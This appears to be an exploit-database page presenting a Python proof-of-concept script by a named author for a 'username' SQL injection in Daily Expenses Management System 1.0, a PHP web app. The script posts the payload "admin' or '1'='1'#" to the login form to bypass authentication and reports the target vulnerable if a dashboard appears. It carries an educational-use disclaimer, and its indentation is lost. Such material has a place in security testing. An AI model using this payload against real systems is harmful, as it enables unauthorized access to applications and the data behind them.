Daily expenses management system 1.0 username sql injection Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2020-08-04 | Type : webapps | Platform : php
This exploit / vulnerability Daily expenses management system 1.0 username sql injection is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

# Exploit Title: Daily Expenses Management System 1.0 - 'username' SQL Injection
# Exploit Author: Daniel Ortiz
# Date: 2020-08-01
# Vendor Homepage: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html
# Tested on: XAMPP Version 5.6.40 / Windows 10
# Software Link: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html

import sys
import requests
import urllib3
import re
import time


urllib3.disable_warnings(urllib3.exceptions.InsecurePlatformWarning)

def make_request(url, payload):

p = {"http":"127.0.0.1:8080", "https": "127.0.0.1:8080"}
s = requests.Session()
r = s.post(url, data=payload, proxies=p)
return r

if __name__ == '__main__':

if len(sys.argv) != 2:
print("[*] Daily Expenses Management System | username SQL injection")
print("[*] usage: %s TARGET" % sys.argv[0])
print("[*] e.g: %s 192.168.0.10" % sys.argv[0])
sys.exit(-1)

TARGET = sys.argv[1]
LOGIN_FORM = "http://%s/dets/" % TARGET


# Step 1 - Bypass login form

url = LOGIN_FORM
p1 = {'email': "admin' or '1'='1'#", 'password': 'admin', 'login': 'login'}
r = make_request(url, p1)
print("[+] Endpoint: %s") % LOGIN_FORM
print("[+] Making requests with payload: %s") % p1

if re.findall('Dashboard', r.text):
print("[+] Target vulnerable")
else:
print("[-] Error !!!")